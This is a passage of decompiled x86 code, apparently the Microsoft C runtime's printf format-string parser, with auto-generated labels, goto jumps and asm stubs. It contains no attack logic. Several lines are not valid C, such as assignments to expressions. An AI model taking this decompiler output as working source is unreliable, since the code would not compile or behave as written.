                            						__edx =  *(__ebp - 0x10) | 0x00000200;
                            						__eflags = __edx;
                            						 *(__ebp - 0x10) = __edx;
                            					}
                            					while(1) {
                            						L150:
                            						__eflags =  *(_t674 - 0x10) & 0x00008000;
                            						if(( *(_t674 - 0x10) & 0x00008000) == 0) {
                            							_t623 =  *(_t674 - 0x10) & 0x00001000;
                            							__eflags = _t623;
                            							if(_t623 == 0) {
                            								__eflags =  *(_t674 - 0x10) & 0x00000020;
                            								if(( *(_t674 - 0x10) & 0x00000020) == 0) {
                            									_t625 =  *(_t674 - 0x10) & 0x00000040;
                            									__eflags = _t625;
                            									if(_t625 == 0) {
                            										_t483 = E0041C290(_t674 + 0x14);
                            										_t676 = _t676 + 4;
                            										__eflags = 0;
                            										 *(_t674 - 0x4a0) = _t483;
                            										 *(_t674 - 0x49c) = 0;
                            									} else {
                            										_t556 = E0041C290(_t674 + 0x14);
                            										_t676 = _t676 + 4;
                            										asm("cdq");
                            										 *(_t674 - 0x4a0) = _t556;
                            										 *(_t674 - 0x49c) = _t625;
                            									}
                            								} else {
                            									_t671 =  *(_t674 - 0x10) & 0x00000040;
                            									__eflags = _t671;
                            									if(_t671 == 0) {
                            										_t557 = E0041C290(_t674 + 0x14);
                            										_t676 = _t676 + 4;
                            										asm("cdq");
                            										 *(_t674 - 0x4a0) = _t557 & 0x0000ffff;
                            										 *(_t674 - 0x49c) = _t671;
                            									} else {
                            										_t560 = E0041C290(_t674 + 0x14);
                            										_t676 = _t676 + 4;
                            										asm("cdq");
                            										 *(_t674 - 0x4a0) = _t560;
                            										 *(_t674 - 0x49c) = _t671;
                            									}
                            								}
                            							} else {
                            								_t563 = E0041C2B0(_t674 + 0x14);
                            								_t676 = _t676 + 4;
                            								 *(_t674 - 0x4a0) = _t563;
                            								 *(_t674 - 0x49c) = _t623;
                            							}
                            						} else {
                            							_t564 = E0041C2B0(_t674 + 0x14);
                            							_t676 = _t676 + 4;
                            							 *(_t674 - 0x4a0) = _t564;
                            							 *(_t674 - 0x49c) = _t621;
                            						}
                            						__eflags =  *(_t674 - 0x10) & 0x00000040;
                            						if(( *(_t674 - 0x10) & 0x00000040) == 0) {
                            							goto L167;
                            						}
                            						L163:
                            						__eflags =  *(_t674 - 0x49c);
                            						if(__eflags > 0) {
                            							goto L167;
                            						}
                            						L164:
                            						if(__eflags < 0) {
                            							L166:
                            							asm("adc edx, 0x0");
                            							 *(_t674 - 0x4a8) =  ~( *(_t674 - 0x4a0));
                            							 *(_t674 - 0x4a4) =  ~( *(_t674 - 0x49c));
                            							 *(_t674 - 0x10) =  *(_t674 - 0x10) | 0x00000100;
                            							L168:
                            							__eflags =  *(_t674 - 0x10) & 0x00008000;
                            							if(( *(_t674 - 0x10) & 0x00008000) == 0) {
                            								__eflags =  *(_t674 - 0x10) & 0x00001000;
                            								if(( *(_t674 - 0x10) & 0x00001000) == 0) {
                            									_t552 =  *(_t674 - 0x4a4) & 0x00000000;
                            									__eflags = _t552;
                            									 *(_t674 - 0x4a4) = _t552;
                            								}
                            							}
                            							__eflags =  *(_t674 - 0x30);
                            							if( *(_t674 - 0x30) >= 0) {
                            								 *(_t674 - 0x10) =  *(_t674 - 0x10) & 0xfffffff7;
                            								__eflags =  *(_t674 - 0x30) - 0x200;
                            								if( *(_t674 - 0x30) > 0x200) {
                            									 *(_t674 - 0x30) = 0x200;
                            								}
                            							} else {
                            								 *(_t674 - 0x30) = 1;
                            							}
                            							__eflags =  *(_t674 - 0x4a8) |  *(_t674 - 0x4a4);
                            							if(( *(_t674 - 0x4a8) |  *(_t674 - 0x4a4)) == 0) {
                            								 *(_t674 - 0x1c) = 0;
                            							}
                            							 *((intOrPtr*)(_t674 - 4)) = _t674 - 0x249;
                            							while(1) {
                            								L178:
                            								_t631 =  *(_t674 - 0x30) - 1;
                            								 *(_t674 - 0x30) =  *(_t674 - 0x30) - 1;
                            								__eflags =  *(_t674 - 0x30);
                            								if( *(_t674 - 0x30) > 0) {
                            									goto L180;
                            								}
                            								L179:
                            								__eflags =  *(_t674 - 0x4a8) |  *(_t674 - 0x4a4);
                            								if(( *(_t674 - 0x4a8) |  *(_t674 - 0x4a4)) == 0) {
                            									L183:
                            									 *(_t674 - 0x24) = _t674 - 0x249 -  *((intOrPtr*)(_t674 - 4));
                            									 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) + 1;
                            									__eflags =  *(_t674 - 0x10) & 0x00000200;
                            									if(( *(_t674 - 0x10) & 0x00000200) == 0) {
                            										while(1) {
                            											L187:
                            											__eflags =  *(_t674 - 0x28);
                            											if( *(_t674 - 0x28) != 0) {
                            												goto L212;
                            											}
                            											L188:
                            											__eflags =  *(_t674 - 0x10) & 0x00000040;
                            											if(( *(_t674 - 0x10) & 0x00000040) != 0) {
                            												__eflags =  *(_t674 - 0x10) & 0x00000100;
                            												if(( *(_t674 - 0x10) & 0x00000100) == 0) {
                            													__eflags =  *(_t674 - 0x10) & 0x00000001;
                            													if(( *(_t674 - 0x10) & 0x00000001) == 0) {
                            														__eflags =  *(_t674 - 0x10) & 0x00000002;
                            														if(( *(_t674 - 0x10) & 0x00000002) != 0) {
                            															 *((short*)(_t674 - 0x14)) = 0x20;
                            															 *(_t674 - 0x1c) = 1;
                            														}
                            													} else {
                            														 *((short*)(_t674 - 0x14)) = 0x2b;
                            														 *(_t674 - 0x1c) = 1;
                            													}
                            												} else {
                            													 *((short*)(_t674 - 0x14)) = 0x2d;
                            													 *(_t674 - 0x1c) = 1;
                            												}
                            											}
                            											 *((intOrPtr*)(_t674 - 0x4ac)) =  *((intOrPtr*)(_t674 - 0x18)) -  *(_t674 - 0x24) -  *(_t674 - 0x1c);
                            											__eflags =  *(_t674 - 0x10) & 0x0000000c;
                            											if(( *(_t674 - 0x10) & 0x0000000c) == 0) {
                            												E00423FF0(0x20,  *((intOrPtr*)(_t674 - 0x4ac)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
                            												_t676 = _t676 + 0x10;
                            											}
                            											E00424030( *(_t674 - 0x1c), _t674 - 0x14,  *(_t674 - 0x1c),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
                            											_t676 = _t676 + 0x10;
                            											__eflags =  *(_t674 - 0x10) & 0x00000008;
                            											if(( *(_t674 - 0x10) & 0x00000008) != 0) {
                            												__eflags =  *(_t674 - 0x10) & 0x00000004;
                            												if(( *(_t674 - 0x10) & 0x00000004) == 0) {
                            													E00423FF0(0x30,  *((intOrPtr*)(_t674 - 0x4ac)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
                            													_t676 = _t676 + 0x10;
                            												}
                            											}
                            											__eflags =  *(_t674 - 0xc);
                            											if( *(_t674 - 0xc) != 0) {
                            												L208:
                            												E00424030( *(_t674 - 0x24),  *((intOrPtr*)(_t674 - 4)),  *(_t674 - 0x24),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
                            												_t676 = _t676 + 0x10;
                            												goto L209;
                            											} else {
                            												L201:
                            												__eflags =  *(_t674 - 0x24);
                            												if( *(_t674 - 0x24) <= 0) {
                            													goto L208;
                            												}
                            												L202:
                            												 *((intOrPtr*)(_t674 - 0x4b0)) =  *((intOrPtr*)(_t674 - 4));
                            												 *(_t674 - 0x4b4) =  *(_t674 - 0x24);
                            												while(1) {
                            													L203:
                            													 *(_t674 - 0x4b4) =  *(_t674 - 0x4b4) - 1;
                            													__eflags =  *(_t674 - 0x4b4);
                            													if( *(_t674 - 0x4b4) <= 0) {
                            														break;
                            													}
                            													L204:
                            													_t535 = E0040D3B0(_t674 - 0x40);
                            													_t539 = E00419150(_t674 - 0x458,  *((intOrPtr*)(_t674 - 0x4b0)),  *((intOrPtr*)( *((intOrPtr*)(E0040D3B0(_t674 - 0x40))) + 0xac)), _t535);
                            													_t676 = _t676 + 0x10;
                            													 *(_t674 - 0x4b8) = _t539;
                            													__eflags =  *(_t674 - 0x4b8);
                            													if( *(_t674 - 0x4b8) > 0) {
                            														L206:
                            														E00423F90( *(_t674 - 0x458) & 0x0000ffff,  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
                            														_t676 = _t676 + 0xc;
                            														 *((intOrPtr*)(_t674 - 0x4b0)) =  *((intOrPtr*)(_t674 - 0x4b0)) +  *(_t674 - 0x4b8);
                            														continue;
                            													}
                            													L205:
                            													 *(_t674 - 0x44c) = 0xffffffff;
                            													break;
                            												}
                            												L207:
                            												L209:
                            												__eflags =  *(_t674 - 0x44c);
                            												if( *(_t674 - 0x44c) >= 0) {
                            													__eflags =  *(_t674 - 0x10) & 0x00000004;
                            													if(( *(_t674 - 0x10) & 0x00000004) != 0) {
                            														E00423FF0(0x20,  *((intOrPtr*)(_t674 - 0x4ac)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
                            														_t676 = _t676 + 0x10;
                            													}
                            												}
                            											}
                            											L212:
                            											__eflags =  *(_t674 - 0x20);
                            											if( *(_t674 - 0x20) != 0) {
                            												L0040C240( *(_t674 - 0x20), 2);
                            												_t676 = _t676 + 8;
                            												 *(_t674 - 0x20) = 0;
                            											}
                            											while(1) {
                            												L214:
                            												 *(_t674 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t674 + 0xc))));
                            												_t580 =  *(_t674 - 0x454) & 0x0000ffff;
                            												 *((intOrPtr*)(_t674 + 0xc)) =  *((intOrPtr*)(_t674 + 0xc)) + 2;
                            												if(( *(_t674 - 0x454) & 0x0000ffff) == 0 ||  *(_t674 - 0x44c) < 0) {
                            													break;
                            												} else {
                            													if(( *(_t674 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t674 - 0x454) & 0x0000ffff) > 0x78) {
                            														 *(_t674 - 0x4d8) = 0;
                            													} else {
                            														 *(_t674 - 0x4d8) =  *(( *(_t674 - 0x454) & 0x0000ffff) + L"pecifier\", 0)") & 0xf;
                            													}
                            												}
                            												L7:
                            												 *(_t674 - 0x450) =  *(_t674 - 0x4d8);
                            												_t644 =  *(_t674 - 0x450) * 9;
                            												_t509 =  *(_t674 - 0x45c);
                            												_t588 = ( *(_t644 + _t509 + 0x4083d0) & 0x000000ff) >> 4;
                            												 *(_t674 - 0x45c) = ( *(_t644 + _t509 + 0x4083d0) & 0x000000ff) >> 4;
                            												if( *(_t674 - 0x45c) != 8) {
                            													L16:
                            													 *(_t674 - 0x4e0) =  *(_t674 - 0x45c);
                            													__eflags =  *(_t674 - 0x4e0) - 7;
                            													if( *(_t674 - 0x4e0) > 7) {
                            														continue;
                            													}
                            													L17:
                            													switch( *((intOrPtr*)( *(_t674 - 0x4e0) * 4 +  &M00423E84))) {
                            														case 0:
                            															L18:
                            															 *(_t674 - 0xc) = 1;
                            															E00423F90( *(_t674 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
                            															_t676 = _t676 + 0xc;
                            															goto L214;
                            														case 1:
                            															L19:
                            															 *(__ebp - 0x2c) = 0;
                            															__ecx =  *(__ebp - 0x2c);
                            															 *(__ebp - 0x28) = __ecx;
                            															__edx =  *(__ebp - 0x28);
                            															 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            															__eax =  *(__ebp - 0x18);
                            															 *(__ebp - 0x1c) =  *(__ebp - 0x18);
                            															 *(__ebp - 0x10) = 0;
                            															 *(__ebp - 0x30) = 0xffffffff;
                            															 *(__ebp - 0xc) = 0;
                            															goto L214;
                            														case 2:
                            															L20:
                            															__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            															 *(__ebp - 0x4e4) = __ecx;
                            															 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            															 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            															__eflags =  *(__ebp - 0x4e4) - 0x10;
                            															if( *(__ebp - 0x4e4) > 0x10) {
                            																goto L27;
                            															}
                            															L21:
                            															_t58 =  *(__ebp - 0x4e4) + 0x423ebc; // 0x498d04
                            															__ecx =  *_t58 & 0x000000ff;
                            															switch( *((intOrPtr*)(__ecx * 4 +  &M00423EA4))) {
                            																case 0:
                            																	goto L24;
                            																case 1:
                            																	goto L25;
                            																case 2:
                            																	goto L23;
                            																case 3:
                            																	goto L22;
                            																case 4:
                            																	goto L26;
                            																case 5:
                            																	goto L27;
                            															}
                            														case 3:
                            															L28:
                            															__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            															__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
                            															if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            																__edx =  *(__ebp - 0x18);
                            																__edx =  *(__ebp - 0x18) * 0xa;
                            																__eflags = __edx;
                            																_t82 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            																__ecx = __edx + _t82;
                            																 *(__ebp - 0x18) = __ecx;
                            															} else {
                            																__edx = __ebp + 0x14;
                            																 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            																__eflags =  *(__ebp - 0x18);
                            																if( *(__ebp - 0x18) < 0) {
                            																	__eax =  *(__ebp - 0x10);
                            																	__eax =  *(__ebp - 0x10) | 0x00000004;
                            																	__eflags = __eax;
                            																	 *(__ebp - 0x10) = __eax;
                            																	__ecx =  *(__ebp - 0x18);
                            																	__ecx =  ~( *(__ebp - 0x18));
                            																	 *(__ebp - 0x18) = __ecx;
                            																}
                            															}
                            															L33:
                            															goto L214;
                            														case 4:
                            															L34:
                            															 *(__ebp - 0x30) = 0;
                            															goto L214;
                            														case 5:
                            															L35:
                            															__edx =  *(__ebp - 0x454) & 0x0000ffff;
                            															__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
                            															if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            																__ecx =  *(__ebp - 0x30);
                            																__ecx =  *(__ebp - 0x30) * 0xa;
                            																__eflags = __ecx;
                            																_t93 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            																__eax = __ecx + _t93;
                            																 *(__ebp - 0x30) = __ecx + _t93;
                            															} else {
                            																__eax = __ebp + 0x14;
                            																 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            																__eflags =  *(__ebp - 0x30);
                            																if( *(__ebp - 0x30) < 0) {
                            																	 *(__ebp - 0x30) = 0xffffffff;
                            																}
                            															}
                            															goto L214;
                            														case 6:
                            															L41:
                            															__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            															 *(__ebp - 0x4e8) = __ecx;
                            															 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            															 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            															__eflags =  *(__ebp - 0x4e8) - 0x2e;
                            															if( *(__ebp - 0x4e8) > 0x2e) {
                            																L64:
                            																goto L214;
                            															}
                            															L42:
                            															_t101 =  *(__ebp - 0x4e8) + 0x423ee4; // 0x36f19003
                            															__ecx =  *_t101 & 0x000000ff;
                            															switch( *((intOrPtr*)(__ecx * 4 +  &M00423ED0))) {
                            																case 0:
                            																	L47:
                            																	__ecx =  *(__ebp + 0xc);
                            																	__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																	__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
                            																	if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
                            																		L50:
                            																		__ecx =  *(__ebp + 0xc);
                            																		__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																		__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
                            																		if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
                            																			L53:
                            																			__ecx =  *(__ebp + 0xc);
                            																			__edx =  *__ecx & 0x0000ffff;
                            																			__eflags = ( *__ecx & 0x0000ffff) - 0x64;
                            																			if(( *__ecx & 0x0000ffff) == 0x64) {
                            																				L59:
                            																				L61:
                            																				goto L64;
                            																			}
                            																			L54:
                            																			__eax =  *(__ebp + 0xc);
                            																			__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																			__eflags = __ecx - 0x69;
                            																			if(__ecx == 0x69) {
                            																				goto L59;
                            																			}
                            																			L55:
                            																			__edx =  *(__ebp + 0xc);
                            																			__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																			__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
                            																			if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
                            																				goto L59;
                            																			}
                            																			L56:
                            																			__ecx =  *(__ebp + 0xc);
                            																			__edx =  *__ecx & 0x0000ffff;
                            																			__eflags = ( *__ecx & 0x0000ffff) - 0x75;
                            																			if(( *__ecx & 0x0000ffff) == 0x75) {
                            																				goto L59;
                            																			}
                            																			L57:
                            																			__eax =  *(__ebp + 0xc);
                            																			__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																			__eflags = __ecx - 0x78;
                            																			if(__ecx == 0x78) {
                            																				goto L59;
                            																			}
                            																			L58:
                            																			__edx =  *(__ebp + 0xc);
                            																			__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																			__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
                            																			if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
                            																				 *(__ebp - 0x45c) = 0;
                            																				goto L18;
                            																			}
                            																			goto L59;
                            																		}
                            																		L51:
                            																		__eax =  *(__ebp + 0xc);
                            																		__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            																		__eflags = __ecx - 0x32;
                            																		if(__ecx != 0x32) {
                            																			goto L53;
                            																		} else {
                            																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            																			goto L61;
                            																		}
                            																	}
                            																	L48:
                            																	__eax =  *(__ebp + 0xc);
                            																	__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            																	__eflags = __ecx - 0x34;
                            																	if(__ecx != 0x34) {
                            																		goto L50;
                            																	} else {
                            																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            																		goto L61;
                            																	}
                            																case 1:
                            																	L62:
                            																	__ecx =  *(__ebp - 0x10);
                            																	__ecx =  *(__ebp - 0x10) | 0x00000020;
                            																	 *(__ebp - 0x10) = __ecx;
                            																	goto L64;
                            																case 2:
                            																	L43:
                            																	__edx =  *(__ebp + 0xc);
                            																	__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																	__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
                            																	if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
                            																		__eax =  *(__ebp - 0x10);
                            																		__eax =  *(__ebp - 0x10) | 0x00000010;
                            																		__eflags = __eax;
                            																		 *(__ebp - 0x10) = __eax;
                            																	} else {
                            																		__ecx =  *(__ebp + 0xc);
                            																		__ecx =  *(__ebp + 0xc) + 2;
                            																		 *(__ebp + 0xc) = __ecx;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																	}
                            																	goto L64;
                            																case 3:
                            																	L63:
                            																	__edx =  *(__ebp - 0x10);
                            																	__edx =  *(__ebp - 0x10) | 0x00000800;
                            																	__eflags = __edx;
                            																	 *(__ebp - 0x10) = __edx;
                            																	goto L64;
                            																case 4:
                            																	goto L64;
                            															}
                            														case 7:
                            															L65:
                            															__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            															 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
                            															__ecx =  *(__ebp - 0x4ec);
                            															__ecx =  *(__ebp - 0x4ec) - 0x41;
                            															 *(__ebp - 0x4ec) = __ecx;
                            															__eflags =  *(__ebp - 0x4ec) - 0x37;
                            															if( *(__ebp - 0x4ec) > 0x37) {
                            																while(1) {
                            																	L187:
                            																	__eflags =  *(_t674 - 0x28);
                            																	if( *(_t674 - 0x28) != 0) {
                            																		goto L212;
                            																	}
                            																	goto L188;
                            																}
                            															}
                            															L66:
                            															_t142 =  *(__ebp - 0x4ec) + 0x423f50; // 0xcccccc0d
                            															__eax =  *_t142 & 0x000000ff;
                            															switch( *((intOrPtr*)(( *_t142 & 0x000000ff) * 4 +  &M00423F14))) {
                            																case 0:
                            																	L120:
                            																	 *(__ebp - 0x2c) = 1;
                            																	 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
                            																	__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
                            																	 *(__ebp - 0x454) = __ax;
                            																	goto L121;
                            																case 1:
                            																	L67:
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																	__eflags =  *(__ebp - 0x10) & 0x00000830;
                            																	if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																		__edx =  *(__ebp - 0x10);
                            																		__edx =  *(__ebp - 0x10) | 0x00000020;
                            																		__eflags = __edx;
                            																		 *(__ebp - 0x10) = __edx;
                            																	}
                            																	goto L69;
                            																case 2:
                            																	L82:
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																	__eflags =  *(__ebp - 0x10) & 0x00000830;
                            																	if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																		__ecx =  *(__ebp - 0x10);
                            																		__ecx =  *(__ebp - 0x10) | 0x00000020;
                            																		__eflags = __ecx;
                            																		 *(__ebp - 0x10) = __ecx;
                            																	}
                            																	goto L84;
                            																case 3:
                            																	L144:
                            																	 *(__ebp - 0x460) = 7;
                            																	goto L146;
                            																case 4:
                            																	L75:
                            																	__eax = __ebp + 0x14;
                            																	 *(__ebp - 0x474) = E0041C290(__ebp + 0x14);
                            																	__eflags =  *(__ebp - 0x474);
                            																	if( *(__ebp - 0x474) == 0) {
                            																		L77:
                            																		__edx =  *0x60b4f0; // 0x407424
                            																		 *(__ebp - 4) = __edx;
                            																		__eax =  *(__ebp - 4);
                            																		 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																		L81:
                            																		goto L187;
                            																	}
                            																	L76:
                            																	__ecx =  *(__ebp - 0x474);
                            																	__eflags =  *(__ecx + 4);
                            																	if( *(__ecx + 4) != 0) {
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000800;
                            																		if(( *(__ebp - 0x10) & 0x00000800) == 0) {
                            																			 *(__ebp - 0xc) = 0;
                            																			__edx =  *(__ebp - 0x474);
                            																			__eax =  *(__edx + 4);
                            																			 *(__ebp - 4) =  *(__edx + 4);
                            																			__ecx =  *(__ebp - 0x474);
                            																			__edx =  *__ecx;
                            																			 *(__ebp - 0x24) =  *__ecx;
                            																		} else {
                            																			__edx =  *(__ebp - 0x474);
                            																			__eax =  *(__edx + 4);
                            																			 *(__ebp - 4) =  *(__edx + 4);
                            																			__ecx =  *(__ebp - 0x474);
                            																			__eax =  *__ecx;
                            																			asm("cdq");
                            																			 *__ecx - __edx =  *__ecx - __edx >> 1;
                            																			 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
                            																			 *(__ebp - 0xc) = 1;
                            																		}
                            																		goto L81;
                            																	}
                            																	goto L77;
                            																case 5:
                            																	L121:
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																	 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																	__edx = __ebp - 0x448;
                            																	 *(__ebp - 4) = __ebp - 0x448;
                            																	 *(__ebp - 0x44) = 0x200;
                            																	__eflags =  *(__ebp - 0x30);
                            																	if( *(__ebp - 0x30) >= 0) {
                            																		L123:
                            																		__eflags =  *(__ebp - 0x30);
                            																		if( *(__ebp - 0x30) != 0) {
                            																			L126:
                            																			__eflags =  *(__ebp - 0x30) - 0x200;
                            																			if( *(__ebp - 0x30) > 0x200) {
                            																				 *(__ebp - 0x30) = 0x200;
                            																			}
                            																			L128:
                            																			__eflags =  *(__ebp - 0x30) - 0xa3;
                            																			if( *(__ebp - 0x30) > 0xa3) {
                            																				__ecx =  *(__ebp - 0x30);
                            																				__ecx =  *(__ebp - 0x30) + 0x15d;
                            																				 *(__ebp - 0x20) = L0040B5C0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
                            																				__eflags =  *(__ebp - 0x20);
                            																				if( *(__ebp - 0x20) == 0) {
                            																					 *(__ebp - 0x30) = 0xa3;
                            																				} else {
                            																					__edx =  *(__ebp - 0x20);
                            																					 *(__ebp - 4) =  *(__ebp - 0x20);
                            																					 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																					 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
                            																				}
                            																			}
                            																			 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																			 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																			__edx =  *(__ebp + 0x14);
                            																			__eax =  *(__edx - 8);
                            																			__ecx =  *(__edx - 4);
                            																			 *(__ebp - 0x490) =  *(__edx - 8);
                            																			 *(__ebp - 0x48c) =  *(__edx - 4);
                            																			__ecx = __ebp - 0x40;
                            																			_push(E0040D3B0(__ebp - 0x40));
                            																			__edx =  *(__ebp - 0x2c);
                            																			_push( *(__ebp - 0x2c));
                            																			__eax =  *(__ebp - 0x30);
                            																			_push( *(__ebp - 0x30));
                            																			__ecx =  *(__ebp - 0x454);
                            																			_push( *(__ebp - 0x454));
                            																			__edx =  *(__ebp - 0x44);
                            																			_push( *(__ebp - 0x44));
                            																			__eax =  *(__ebp - 4);
                            																			_push( *(__ebp - 4));
                            																			__ecx = __ebp - 0x490;
                            																			_push(__ebp - 0x490);
                            																			__edx =  *0x60b3cc; // 0x7e8c4bdb
                            																			E00410200(__edx) =  *__eax();
                            																			__esp = __esp + 0x1c;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																				__eflags =  *(__ebp - 0x30);
                            																				if( *(__ebp - 0x30) == 0) {
                            																					__ecx = __ebp - 0x40;
                            																					_push(E0040D3B0(__ebp - 0x40));
                            																					__ecx =  *(__ebp - 4);
                            																					_push( *(__ebp - 4));
                            																					__edx =  *0x60b3d8; // 0x7e8c4bdb
                            																					E00410200(__edx) =  *__eax();
                            																					__esp = __esp + 8;
                            																				}
                            																			}
                            																			__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            																			__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
                            																			if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																				__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																				if(( *(__ebp - 0x10) & 0x00000080) == 0) {
                            																					__ecx = __ebp - 0x40;
                            																					_push(E0040D3B0(__ebp - 0x40));
                            																					__edx =  *(__ebp - 4);
                            																					_push( *(__ebp - 4));
                            																					__eax =  *0x60b3d4; // 0x7e8c4bdb
                            																					__eax =  *__eax();
                            																					__esp = __esp + 8;
                            																				}
                            																			}
                            																			__ecx =  *(__ebp - 4);
                            																			__edx =  *( *(__ebp - 4));
                            																			__eflags =  *( *(__ebp - 4)) - 0x2d;
                            																			if( *( *(__ebp - 4)) == 0x2d) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																				__ecx =  *(__ebp - 4);
                            																				__ecx =  *(__ebp - 4) + 1;
                            																				__eflags = __ecx;
                            																				 *(__ebp - 4) = __ecx;
                            																			}
                            																			__edx =  *(__ebp - 4);
                            																			 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																			do {
                            																				L187:
                            																				__eflags =  *(_t674 - 0x28);
                            																				if( *(_t674 - 0x28) != 0) {
                            																					goto L212;
                            																				}
                            																				goto L188;
                            																			} while ( *(__ebp - 0x4ec) > 0x37);
                            																			goto L66;
                            																		}
                            																		L124:
                            																		__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            																		__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
                            																		if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
                            																			goto L126;
                            																		}
                            																		L125:
                            																		 *(__ebp - 0x30) = 1;
                            																		goto L128;
                            																	}
                            																	L122:
                            																	 *(__ebp - 0x30) = 6;
                            																	goto L128;
                            																case 6:
                            																	L69:
                            																	 *(__ebp - 0xc) = 1;
                            																	__ebp + 0x14 = E0041C290(__ebp + 0x14);
                            																	 *(__ebp - 0x458) = __ax;
                            																	__ecx =  *(__ebp - 0x10);
                            																	__ecx =  *(__ebp - 0x10) & 0x00000020;
                            																	__eflags = __ecx;
                            																	if(__ecx == 0) {
                            																		 *(__ebp - 0x448) =  *(__ebp - 0x458);
                            																	} else {
                            																		 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
